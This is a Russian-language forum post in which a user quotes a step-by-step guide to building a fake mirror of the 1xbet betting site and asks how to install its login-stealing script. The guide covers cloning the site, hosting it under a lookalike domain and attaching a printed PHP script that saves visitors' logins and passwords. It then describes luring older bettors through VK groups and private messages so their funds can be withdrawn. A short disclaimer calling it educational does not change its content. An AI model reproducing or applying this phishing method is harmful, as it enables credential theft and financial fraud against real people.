Помогите с фейк сайтом 1хбет

Тема в разделе "Сайтостроение и дизайн", создана пользователем Sven44, 13 май 2017.

  1. Sven44

    Sven44

    Сообщения:
    21
    Баллы:
    1
    Была такая тема:
    Заработок будет на фейк сайте 1xbet. Зеркало найти реально трудно,много людей просто не могут найти зеркло, поэтому люди будут заинтересованы в нашем сайте. Плагин делает точную копию сайта
    Этим способом заработал за день 30к, попался мне вот такой человек. Способ для тех, кто шарит, кто нет, пишите свои акки от хостингера, создам вам сайт, у меня займет минут 10.

    Для начала качаем FireFOx
    Ставим плагин ScrapBook -
    Гуглим зеркало 1xbet Зеркала сайта букмекерской конторы 1хбет | 1xbet букмекер


    Заходим на сайт, обычно ссылки длинные, удаляем все лишнее
    Пример Ставки на спорт онлайн | Букмекерская контора 1XBET.COM
    Делаем https://1xwol.xyz



    Правый клик в любое место на 1xbet, сохранить страницу как Выбираем все галочки, javascript тоже,глубина скачки по умолчанию должна стоять 0 если не стоит ставим. Ждем, после появится поле. Если не появиться данное поле то нечего страшного в этом нет!

    Жмем остановить Галочки стоят везде, оставляем там, где наш адрес 1xwol.xyz
    Если у вас будет другой адрес, то ставьте свои галочки. Ждем, после закачки жмем на клавиатуре win+R


    Пишем appdata либо %appdata%
    Далее идем в папку roaming/Mozilla/FireFox/profiles/профиль(набор английских букв)/ScrapBook/Data/(папка с цифрами) дальше можете открыть, проверить (любой файл, с названием default.html)
    Все, это полная копия сайта 1xbet. Не отличить.


    Далее, нужно зарегистрироваться на hostinger.ru
    Теперь там платная регистрация, но на hostinger.com.ar бесплатная, но сайт аргентинский.
    Дальше качаем FileZilla


    Создаем новый сайт, адрес выбирайте типа 1xwizo.hol.es По ftp заливайте все файлы из папки, где копия 1xbet Прежде удалите все файлы с сервака подрубайте скрипт на запись логина и пароля, есть везде

    КОД:
    <?PHP
    $Log = $_POST['login'];
    $Pass = $_POST['password'];
    $log = fopen("database.txt","at");
    fwrite($log,"\n $Log:$Pass \n");
    fclose($log);
    echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=НАХУЙ ЗДЕСЬ'></head></html>";
    ?>

    Типо того, настраиваете под себя.
    Все, сайт готов, теперь можно покидать по разным группам ставок сообщения типа “нашел нормальное рабочее зеркало 1xbet, работает постоянно,” ну и ссылочку на сайт наш. Просто в поиске групп вк пишите – прогнозы на спорт, или ставки, ищите с коментами. Также расфорсить ссылку можете и сами, вариантов куча Есть варик писать людям в лс, которые есть в этих группах(писать лучше людям по старше, т.к они заливают больше денег), типа “Здарова, не подкинешь рабочий 1xbet, ” потом пишете “Все, я нашел нормальный, прости за беспокойство” и кидаете наш сайт После того, как заполучили акк, выводим деньги, если нашли пустой акк, то ждите, пока зальют туда бабки


    Внимание! ВСЯ ИНФОРМАЦИЯ ПРЕДОСТАВЛЕНА В ОЗНАКОМИТЕЛЬНЫХ ЦЕЛЯХ, ЧТОБЫ ПОКАЗАТЬ КАК РАБОТАЮТ МОШЕННИКИ! Будьте бдительны!

    Так вот я всё знаю как делать за исключением загрузки скрипта с логином и паролем, подскажите кто знает как это сделать.

Поделиться этой страницей